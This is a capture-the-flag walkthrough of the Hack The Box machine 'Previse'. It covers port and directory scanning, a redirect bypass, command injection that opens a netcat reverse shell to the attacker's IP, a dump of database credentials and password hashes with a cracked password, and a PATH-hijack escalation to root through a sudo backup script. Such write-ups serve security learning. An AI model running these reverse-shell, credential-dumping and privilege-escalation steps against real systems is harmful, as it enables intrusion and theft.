PREVISE

Scanning

NMAP

➜  ~ nmap -T4 previse.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 12:12 EDT
Nmap scan report for previse.htb (10.10.11.104)
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds

fast scan to know open ports

Enumeration

port 80

whatweb

➜  ~  sudo whatweb http://previse.htb/login.php
http://previse.htb/login.php [200 OK] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.11.104], Meta-Author[m4lwhere], PasswordField[password], Script, Title[Previse Login]

gobuster

➜  ~ gobuster dir -u http://previse.htb -w ~/SecLists/Discovery/Web-Content/common.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://previse.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/x/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/08/16 13:17:17 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 276]
/.hta                 (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess.php        (Status: 403) [Size: 276]
/.hta.php             (Status: 403) [Size: 276]
/.htpasswd.php        (Status: 403) [Size: 276]
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]
/config.php           (Status: 200) [Size: 0]                   
/css                  (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/download.php         (Status: 302) [Size: 0] [--> login.php]                
/favicon.ico          (Status: 200) [Size: 15406]                            
/files.php            (Status: 302) [Size: 8395] [--> login.php]             
/footer.php           (Status: 200) [Size: 217]                              
/header.php           (Status: 200) [Size: 980]                              
/index.php            (Status: 302) [Size: 2801] [--> login.php]             
/index.php            (Status: 302) [Size: 2801] [--> login.php]             
/js                   (Status: 301) [Size: 307] [--> http://previse.htb/js/] 
/login.php            (Status: 200) [Size: 2224]                             
/logout.php           (Status: 302) [Size: 0] [--> login.php]                
/logs.php             (Status: 302) [Size: 0] [--> login.php]                
/nav.php              (Status: 200) [Size: 1248]                             
/server-status        (Status: 403) [Size: 276]                              
/status.php           (Status: 302) [Size: 2971] [--> login.php]             

===============================================================
2021/08/16 13:21:31 Finished
===============================================================

When we hold the package we will need to change the status code. Let’s do this for.

And click Forward

Let’s enter the site with a small change.

Now let’s press Forward.

Yes, now let’s create a user. And check out the site.

Service Account Access

There is a file here. Download it and check it out.

Mysql information

Exploit

select log data from here

I will try to get myself a reverse shell from here

command nc -e /bin/sh 10.10.16.17 1234

add and encode ...

USER SHELL ACCESS

python -c 'import pty;pty.spawn("/bin/bash")'

from backup we had download open config.php file

Credentials root:mySQL_p@ssw0rd!:) at previse DB

www-data@previse:/var/www/html$ mysql -u root -p
Enter password: mySQL_p@ssw0rd!:)
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| previse            |
| sys                |
+--------------------+

mysql> use previse;
mysql> show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+

mysql> select * from accounts;
+----+-------------+------------------------------------+---------------------+
| id | username    | password                           | created_at          |
+----+-------------+------------------------------------+---------------------+
|  1 | m4lwhere    | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | userr       | $1$🧂llol$XqhFt5KI.KI/bVVL8EfOe0 | 2021-08-16 12:58:24 |
|  3 | kibouo      | $1$🧂llol$T5FnvDN5sWXa6Eyh1tbUW. | 2021-08-16 13:01:44 |
|  4 | javelin     | $1$🧂llol$6lhphbLFAgKFSGAuFY76l1 | 2021-08-16 13:06:24 |
|  5 | unclebill   | $1$🧂llol$CjeIHiaoyZqRadtFHRc4W/ | 2021-08-16 13:12:03 |
|  6 | Giorgi      | $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 | 2021-08-16 13:37:57 |
|  7 | demouser    | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 14:17:32 |
|  8 | asdfg       | $1$🧂llol$n3EuPeTN2PYbg2K57TRhn1 | 2021-08-16 15:02:17 |
|  9 | vector      | $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 | 2021-08-16 15:11:19 |
| 10 | loller      | $1$🧂llol$6Os6x8QhVyFg6Bm3Pwq/L0 | 2021-08-16 15:48:12 |
| 11 | ericsonsito | $1$🧂llol$oXlR8DTdeOZRd4X9sEOAE0 | 2021-08-16 16:08:19 |
| 12 | xdann1      | $1$🧂llol$3RRrRSP1eU1VYCn0WJj8p0 | 2021-08-16 16:12:12 |
| 13 | b1sh0p      | $1$🧂llol$C01fgIC5dqKV/r53IgKr11 | 2021-08-16 17:12:52 |
| 14 | admin       | $1$🧂llol$uXqzPW6SXUONt.AIOBqLy. | 2021-08-16 17:17:34 |
| 15 | skiddy      | $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// | 2021-08-16 17:23:31 |
| 16 | ayman       | $1$🧂llol$k86J15RFrQV35C.YluXi30 | 2021-08-16 17:40:38 |
| 17 | newguy      | $1$🧂llol$Z94NSX5l4okWmemOfhGQ30 | 2021-08-16 17:41:22 |
| 18 | adilop      | $1$🧂llol$6HoyCpVc.ZwWioSMmBO1C1 | 2021-08-16 17:45:59 |
| 19 | newuser     | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-16 17:46:19 |
| 20 | random1234  | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-16 18:01:37 |
+----+-------------+------------------------------------+---------------------+

after cracking ...

Credential m4lwhere:ilovecody112235!

Privilege Escalation

check sudo rights

we can run access_backup.sh as root

this file trigger gzip lets overwrite it and export path

m4lwhere@previse: echo '#!/bin/bash
    cp /bin/bash /tmp/c
    chmod u+s /tmp/c' > gzip;

m4lwhere@previse: chmod +x gzip;

m4lwhere@previse: export PATH=/tmp:$PATH;

m4lwhere@previse: sudo /opt/scripts/access_backup.sh;

m4lwhere@previse: ./c -p

c-4 ~# cat /root/root.txt
*******************

ROOT SHELL ACCESS

PreviousBOUNTYHUNTER NextDYNSTR

Last updated 4 years ago